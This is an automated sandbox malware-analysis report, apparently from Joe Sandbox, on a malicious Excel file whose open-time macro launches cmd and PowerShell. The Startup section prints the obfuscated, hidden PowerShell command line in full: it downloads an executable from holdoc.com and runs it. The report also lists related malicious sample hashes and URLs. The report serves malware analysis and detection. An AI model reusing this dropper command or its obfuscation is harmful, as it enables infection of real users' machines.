ID: 47598
Sample Name: 18-02-22-(k-irie).xls
Cookbook: defaultwindowsofficecookbook.jbs
Time: 01:30:58
Date: 23/02/2018
Version: 21.0.0

Table of Contents

Analysis Report
  Overview
    General Information
    Detection
    Confidence
    Classification
    Analysis Advice
  Signature Overview
    AV Detection
    Software Vulnerabilities
    Networking
    Data Obfuscation
    Spreading
    System Summary
    HIPS / PFW / Operating System Protection Evasion
    Anti Debugging
    Malware Analysis System Evasion
    Hooking and other Techniques for Hiding and Protection
    Language, Device and Operating System Detection
  Behavior Graph
  Simulations
    Behavior and APIs
  Antivirus Detection
    Initial Sample
    Dropped Files
    Unpacked PE Files
    Domains
  Yara Overview
    Initial Sample
    PCAP (Network Traffic)
    Dropped Files
    Memory Dumps
    Unpacked PEs
  Joe Sandbox View / Context
    IPs
    Domains
    ASN
    Dropped Files
  Screenshot
  Startup
  Created / dropped Files
  Contacted Domains/Contacted IPs
    Contacted Domains
    Contacted IPs
  Static File Info
    General
    File Icon
    Static OLE Info
      General
      OLE File "18-02-22-(k-irie).xls"
        Indicators
        Summary
        Document Summary
        Streams with VBA
          VBA File Name: Sheet1.cls, Stream Size: 977 (General; VBA Code Keywords; VBA Code)
          VBA File Name: ThisWorkbook.cls, Stream Size: 5760 (General; VBA Code Keywords; VBA Code)
        Streams
          Stream Path: \x1CompObj, File Type: data, Stream Size: 107
          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 240
          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168
          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55082
          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 425
          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62
          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3005
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1414
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 106
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 548
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 481
          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 524
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    ICMP Packets
    DNS Queries
    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
  Code Manipulations
  Statistics
    Behavior
  System Behavior
    Analysis Process: EXCEL.EXE PID: 3268 Parent PID: 2948 (General; File Activities; Registry Activities: Key Created)
    Analysis Process: cmd.exe PID: 3348 Parent PID: 3268 (General)
    Analysis Process: powershell.exe PID: 3376 Parent PID: 3348 (General; File Activities: File Created, File Deleted; Registry Activities)
  Disassembly
    Code Analysis

Copyright Joe Security LLC 2018

Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 47598
Start time: 01:30:58
Joe Sandbox Product: CloudBasic
Start date: 23.02.2018
Overall analysis duration: 0h 4m 16s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 18-02-22-(k-irie).xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.evad.expl.winXLS@5/3@3/2
HCA Information: Successful, ratio: 100%; Number of executed functions: 0; Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments:
• Adjust boot time
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint document
• Simulate clicks
• Number of clicks 142
• Close Viewer

Warnings:
• Exclude process from analysis (whitelisted): WmiApSrv.exe, conhost.exe, dllhost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or , or parses a document) for: EXCEL.EXE, powershell.exe

Detection

Strategy | Score | Range | Reporting
Threshold | 84 | 0 - 100 | Report FP / FN

Confidence

Strategy | Score | Range | Further Analysis Required?
Threshold | 5 | 0 - 5 | false

Classification

Classification chart (figure not reproduced). Axes: Ransomware, Miner, Spreading, Phishing, Evader, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Scale: malicious / suspicious / clean.

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; further UI automation would likely extend the observed behavior.

Signature Overview

• AV Detection
• Software Vulnerabilities
• Networking
• Data Obfuscation
• Spreading
• System Summary
• HIPS / PFW / Operating System Protection Evasion
• Anti Debugging
• Malware Analysis System Evasion
• Hooking and other Techniques for Hiding and Protection
• Language, Device and Operating System Detection

AV Detection:

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Document exploit detected (process start blacklist hit)

Networking:

Downloads files from webservers via HTTP

Performs DNS lookups

Urls found in memory or binary data

Domain name seen in connection with other malware

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Obfuscated command line found

Spreading:

Enumerates the

System Summary:

Checks whether correct version of .NET is installed

Found graphical window changes (likely an installer)

Uses Silverlight

Checks if is installed

Uses new MSVCR Dlls

Binary contains paths to debug symbols

Binary contains paths to development resources

Classification label

Creates files inside the user directory

Creates temporary files

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Found command line output

Parts of this application are using the .NET runtime (probably coded in C#)

Reads ini files

Reads software policies

Sample is known by Antivirus (Virustotal or Metascan)

Spawns processes

Uses an in-process (OLE) Automation

Creates mutexes

Document contains embedded VBA macros

Reads the hosts file

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA macro which may execute processes

Powershell connects to network

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Enables debug privileges

Malware Analysis System Evasion:

Queries a list of all running processes

Enumerates the file system

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)

System process connects to network (likely due to code injection or exploit)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Behavior Graph

Behavior graph (figure not reproduced). Recoverable information:

ID: 47598
Sample: 18-02-22-(k-irie).xls
Startdate: 23/02/2018
Architecture: WINDOWS
Score: 84

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Is malicious, Number of created Registry Values, Number of created Files; language markers: Delphi, Java, .Net C# or VB.NET, C, C++ or other language.

EXCEL.EXE (counters shown: 34 and 17; the legend labels these as Number of created Registry Values and Number of created Files)
  Signatures: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; Obfuscated command line found; 3 other signatures
  started cmd.exe (Is malicious)
    Signatures: Document exploit detected (process start blacklist hit); Obfuscated command line found
    started powershell.exe (counters shown: 12 and 8)
      Signatures: Obfuscated command line found; System process connects to network (likely due to code injection or exploit); Powershell connects to network
      DNS/IP Info: holdoc.com; 8.8.8.8 (ports 53, 53440, 56842; GOOGLE-GoogleIncUS; United States); 92.53.78.250 (ports 49163, 49164, 80; SELECTELRU; Russian Federation)

Simulations

Behavior and APIs

Time | Type | Description
01:31:49 | API Interceptor | 1x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
01:31:49 | API Interceptor | 1x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms
01:31:49 | API Interceptor | 1x Sleep call for process: EXCEL.EXE modified from: 300000ms to: 100ms
01:31:54 | API Interceptor | 1x Sleep call for process: powershell.exe modified from: 30000ms to: 100ms

Antivirus Detection

Initial Sample

Source | Detection | Scanner
18-02-22-(k-irie).xls | 31% | virustotal

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner
holdoc.com | 4% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

Match: holdoc.com

Associated Sample Name / URL | SHA 256 | Detection | Context
2018.2.20[s_kawadu].xls | 8b93eb0c322299acebe65e6014accdc02f289e3a4bf411783e8bfcd01e887174 | malicious | 47.52.193.63
2018.2.20[s_kawadu].xls | 8b93eb0c322299acebe65e6014accdc02f289e3a4bf411783e8bfcd01e887174 | malicious | 47.52.193.63

ASN

Match: SELECTELRU

Associated Sample Name / URL | SHA 256 | Detection | Context
7969991545.doc | 5ace6070a2f1c6ecaf06b1f8446998e42540254c1d117064445e44f8ccc56739 | malicious | 82.202.221.88
trickbot.exe | 91f78068e996b1b32a3539746b6b683f5fa40e7be009b779c56e215b521df6c5 | malicious | 95.213.237.224
YhAjMikwxY.docx | 8c30c4096f77feb5103eb18cddc5cb6b74759e7782524dff5bf7335689dce3fd | malicious | 77.244.219.111
http://outpostbeercompany.com/?14A7a2hYF84Gn38Amn=rjones@ricohforensics.com | | malicious | 78.155.207.67
.exe | 57b374e2d2f002c11c69b454fcf1aa57bd971cd0638eca12c6691cdb6a2f011c | malicious | 82.202.238.204
jas-pol.com.pl/jersey/meronto.png | | malicious | 95.213.236.187
http://princessleitheatonde-grimaldi.com/?3os4aoVie6DsIKoEd=BOGOQJQADWCQlPAGCF3LUw | | malicious | 82.202.238.203
4877_Payment.doc | 4972a3d5648283283163eac33a6235fa7c864eae8058d33543b69027fd372a01 | malicious | 92.53.66.60
gGCRjiezSf.doc | d4443f53a7966b856facd134edc77f8ae8a7e7d0d89974a266ca3e577da3c0a6 | malicious | 92.53.78.209
23515_155123.doc | 7157e139fa9e8f1394319742a2f665965e939299217586e51d4c207a4048d7cf | malicious | 95.213.191.147
23515_155123.doc | 7157e139fa9e8f1394319742a2f665965e939299217586e51d4c207a4048d7cf | malicious | 95.213.204.162
banan.exe | 8a9741c8a47088e1633ea9b1c9a48fd00aa16ee2a99652435ce77a5ccaaf2fa9 | malicious | 95.213.251.150
yUGZKvXCSt.doc | 5a9e67a59c80a89293f676b55b4157fbbdd7c504224937b71e352ca7386e1028 | malicious | 95.213.194.234
Jgm1omfumn.doc | 6fbf7c2ba517468f2a2a80d80c2ae220fed9ec31c272dd1948dfd6c3f5aed14b | malicious | 92.53.66.115
http://bbsmoke.com?FE7JoX=dcairns@bchousing.org | | malicious | 92.53.77.216
37Faktura_VAT_902675109.js | fbe473e2f716f588438ec7a9e27e9afaed32106ffa55681ff3107a09af83c057 | malicious | 95.213.235.66
yUGZKvXCSt.doc | 5a9e67a59c80a89293f676b55b4157fbbdd7c504224937b71e352ca7386e1028 | malicious | 78.155.206.154
http://luxurytds.com/go.php?sid=1 | | malicious | 95.213.144.13
BXT8KfER5.exe | 0c5446a511b349773e1031b88cd4fd997cd98b686a4cd4ca5dc16b386961e2c5 | malicious | 185.143.174.234
virus.exe | a7e40660025a2f92bf5b27a429c2a65038932203d7d6c33168f01c47b34868fa | malicious | 80.93.182.14

Dropped Files

No context

Screenshot

Startup

System is w7
EXCEL.EXE (PID: 3268, cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde, MD5: 716335EDBB91DA84FC102425BFDA957E)
  cmd.exe (PID: 3348, cmdline: cMd /c'poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0}{2} {4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','%temp%.exe')}while(!$?);&(\'{0}{2}{1}\'-f'star','ss','t-proce') '%localappdata%.exe''', MD5: AD7B9C14083B52BC532FBA5948342B98)
    powershell.exe (PID: 3376, cmdline: poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen 'do{sleep 25;(.(\'{2}{0}{1}\' -f'-o','bject','new') (\'{1}{3}{5}{0} {2}{4}\' -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('http://holdoc.com/lantrace','C:\Users\HERBBL~1\AppData\Local\Temp.exe')}while(!$?);&(\'{0}{2}{1}\'-f'sta r','ss','t-proce') 'C:\Users\user\AppData\Local.exe'', MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
cleanup

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\18-02-22-(k-irie).LNK
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 13:59:30 2017, mtime=Sun Sep 24 13:59:30 2017, atime=Fri Feb 23 00:31:50 2018, length=76288, window=hide
Size (bytes): 2160
Entropy (8bit): 4.507208926102992
Encrypted: false
MD5: 941E5D0C91732D133D3EA6FCC59651EC
SHA1: F79505767A693BC2431A1998CABAFC764286F0ED
SHA-256: 1E589ACDB46B7DB1C8747C2A13E11AF6183FE3BBDB83F0A00CB03E580C8F814A
SHA-512: 0E29F144B8E6B10C771ABED68BCDB0E85B250D72536565EB6F12C761242790348643968AC17F4D4AED4BF1267DD66A574600640343460306051B13BE3C4F3488
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type: ASCII text, with CRLF line terminators
Size (bytes): 89
Entropy (8bit): 4.308920442144782
Encrypted: false
MD5: 7ECA590620832E8C4F36972F48AB7288
SHA1: 8C564C6FD711A53DCCFB71E204F9C74287840EE5
SHA-256: 7323108B5FB167A226B7D6BBA70E8F7671B3E883C043CA3E5D27E3E9AD33D712
SHA-512: D0A45C0EC7840AC91E7D5024CC0855944610F5DDFA7AC726EB852A325542764960420B9830FA068D19D5FA7D58DECC477475B24E81BF768D7B98F2318C81CFE1
Malicious: false
Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1IS066BSM420YYOJ2CE3.temp
File Type: data
Size (bytes): 8016
Entropy (8bit): 3.5770961918243596
Encrypted: false
MD5: DE54B0C562108894094B2BEF832CBF46
SHA1: A046BDD493711C314BC0E8040778A17E155C16C5
SHA-256: F268E4960C227505DFEA1FD03987D52DC45095AF7C0820D8C7AA3EB17635C0EE
SHA-512: 0E850A2BDA1A32E812B45FAF424131E7347F09B14CAA0691468CA48A96929934664E57BADAAEAF61BA509B750A7B0834D24E6E18835D7F604D0ADD61508C32DA
Malicious: false
Reputation: low

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection
holdoc.com | 92.53.78.250 | true | true | 4%, virustotal

Contacted IPs


IP | Country | ASN | ASN Name | Malicious
8.8.8.8 | United States | 15169 | GOOGLE-GoogleIncUS | false
92.53.78.250 | Russian Federation | 49505 | SELECTELRU | true

Static File Info

General

File type: 0
Entropy (8bit): 6.047278042035873
TrID:
• Microsoft Excel sheet (30009/1) 46.87%
• Microsoft Excel sheet (alternate) (24509/1) 38.28%
• Generic OLE2 / Multistream Compound File (8008/1) 12.51%
• Java Script embedded in Visual Basic Script (1500/0) 2.34%
File name: 18-02-22-(k-irie).xls
File size: 75264
MD5: 1fde2f4438d222541a78d63e85043e63
SHA1: a2e40c537dc3a73b77199a4d8eaf76826f819df6
SHA256: f29afa4665c7d226d093d083a72431237b76c9dbb10bf531c3eaa56090ecf277
SHA512: abecf769db1050cec94a76b0cc7eadd645e3061d2bdde6bd2bca0dbcec3e035176b3ecee64bff1e72a75e864b25a6882b5ada58f421c0a3554ec366a07de67a1
File Content Preview: ...... >...... o......

File Icon

Static OLE Info

General
Document Type: OLE
Number of OLE Files: 1

OLE File "18-02-22-(k-irie).xls"

Indicators
Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream: False
Flash Objects Count: 0
Contains VBA Macros: True

Summary
Code Page: 1251
Create Time: 2017-10-19 07:59:05
Last Saved Time: 2018-02-22 08:21:27
Creating Application: Microsoft Excel
Security: 0

Document Summary
Document Code Page: -535
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 917504

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path: _VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name: Sheet1.cls
Stream Size: 977
Data ASCII: ...... # ...... x ...... M E ......
Data Raw: 01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 c3 e6 d2 fd 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 5760

General
Stream Path: _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name: ThisWorkbook.cls
Stream Size: 5760
Data ASCII: ...... J . . . X ...... ? . . . . # ...... < ...... X ` . ) ~ . I . . . . | s ...... F ...... t . F . - Q . . . s ...... x ...... t . F . - Q . . . s . . X ` . ) ~ . I . . . . | s ...... M E ......
Data Raw: 01 16 01 00 03 00 01 00 00 1c 07 00 00 e4 00 00 00 10 02 00 00 4a 07 00 00 58 07 00 00 f4 10 00 00 00 00 00 00 01 00 00 00 c3 e6 f3 3f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 d9 58 60 1a 29 7e f6 49 be 02 fe bd 7c 73 f2 e9 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keywords: cryocamera "ThisWorkbook" capponecheese zyzybridge ramzessii "xeC" Shell "p://holdoc.com/lantrace','%" "Ct") petroliummer() "owe" "t','ne" depminng Right(Left("multiplexed", copengagend gabrilla False Workbook_Open() zulusniga petroliummer Array("t" (\""{" ramzessii() zyzybridge() gabrilla() goldgoldtime() "o','bj" nagilanile vandamilkler "do{sl" "st','.we" samaramama() Right(Left("lighttight", fidopinions brucegodd Minute(Now), brucegodd(depminng) "}\"" "bclie','em','nt','.ne'" "f'-" "ppd" VB_Base Randomize Left("calamander", samaramama, normalcorrecttoolk "l'+'e')." hannydear VB_Creatable Now(), VB_Exposed Now()) "'sy" maffii fatalerrrrord "DDen "'+'o" fatalerrrrord() Array(Now(), msoAlignLefts depminng() "RS", virtoserer samaramama "-N") "-e") Attribute goldgoldtime Array(Second(Now), VB_PredeclaredId VB_GlobalNameSpace okolokojim heroscopuses "ata") VB_Name Int(Rnd Function VB_Customizable SingleSong() ").(" SingleSong labuyetero VB_TemplateDerived "oke('" Left("Invisible", "w'+'n" Monochrome "t',"

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General
Stream Path: \x1CompObj
File Type: data
Stream Size: 107
Entropy: 4.18482950044
Base64 Encoded: True
Data ASCII: ...... F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q ......
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 240

General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 240
Entropy: 3.03421468289
Base64 Encoded: True
Data ASCII: ...... + , . . 0 ...... H ...... P ...... X ...... ` ...... h ...... p ...... x ...... 2 0 1 8 . . . 2 . . . 2 2 ...... W o r k s h e e t s ......
Data Raw: fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9a 00 00 00 02 00 00 00 e9 fd 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168

General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 168
Entropy: 3.4271007557
Base64 Encoded: False
Data ASCII: ...... O h . . . . . + ' . . 0 . . . x ...... 8 ...... @ ...... X ...... d ...... p ...... M i c r o s o f t E x c e l . @ . . . . . @ " . H . . @ . . . . ] 2 " ......
Data Raw: fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 00 00 00 05 00 00 00 01 00 00 00 38 00 00 00 12 00 00 00 40 00 00 00 0c 00 00 00 58 00 00 00 0d 00 00 00 64 00 00 00 13 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 10 00 00 00 4d 69 63 72 6f 73 6f 66

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55082

General
Stream Path: Workbook
File Type: Applesoft BASIC program data, first line number 16
Stream Size: 55082
Entropy: 6.52470798361
Base64 Encoded: True
Data ASCII: ...... f 2 ...... \\ . p . . . . V A R M U S B . . . . . a ...... = ...... T h i s W o r k b o o k ...... = . . . . . i . . l . 7 8 ...... X . @
Data Raw: 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 56 41 52 4d 55 53 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 425

General
Stream Path: _VBA_PROJECT_CUR/PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 425
Entropy: 5.34572053125
Base64 Encoded: True
Data ASCII: I D = " { 6 E 9 6 D 5 0 9 - D 0 3 C - 4 D A F - B C 3 2 - 9 0 C B 9 0 E 3 A 5 3 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 1 9 3 6 6 8 E 6 A 8 E 6 A 8 E 6 A 8 E 6 A " . . D P B = " 7 E 7 C 8 9 9 E 9 B 6 6 8 9 6 7 8 9 6 7 8 9 " . . G C = " 6 B 6 9 9 C 8 D 8 8 8 E 8 8
Data Raw: 49 44 3d 22 7b 36 45 39 36 44 35 30 39 2d 44 30 33 43 2d 34 44 41 46 2d 42 43 33 32 2d 39 30 43 42 39 30 45 33 41 35 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path: _VBA_PROJECT_CUR/PROJECTwm
File Type: data
Stream Size: 62
Entropy: 3.05546715432
Base64 Encoded: False
Data ASCII: T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
Data Raw: 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3005

General
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type: data
Stream Size: 3005
Entropy: 4.49677521188
Base64 Encoded: False
Data ASCII: . a ...... * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw: cc 61 97 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1414

General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0
File Type: data
Stream Size: 1414
Entropy: 4.24915005422
Base64 Encoded: False
Data ASCII: . K * ...... r U ...... ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ l ...... 0 . . * B L . . P . . . } ...... y ......
Data Raw: 93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 6c 00 00 7f 00 00 00 00 15 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 106

General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1
File Type: data
Stream Size: 106
Entropy: 2.1837232906
Base64 Encoded: False
Data ASCII: r U ...... ~ } ...... 1 ...... p ......
Data Raw: 72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff 03 00 00 09 e1 02 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 70 00 00 7f 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 548

General
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2
File Type: data
Stream Size: 548
Entropy: 2.31128093652
Base64 Encoded: False
Data ASCII: r U ...... 0 ...... + . 4 . . . 1 ...... a ...... Y ...... ` ......
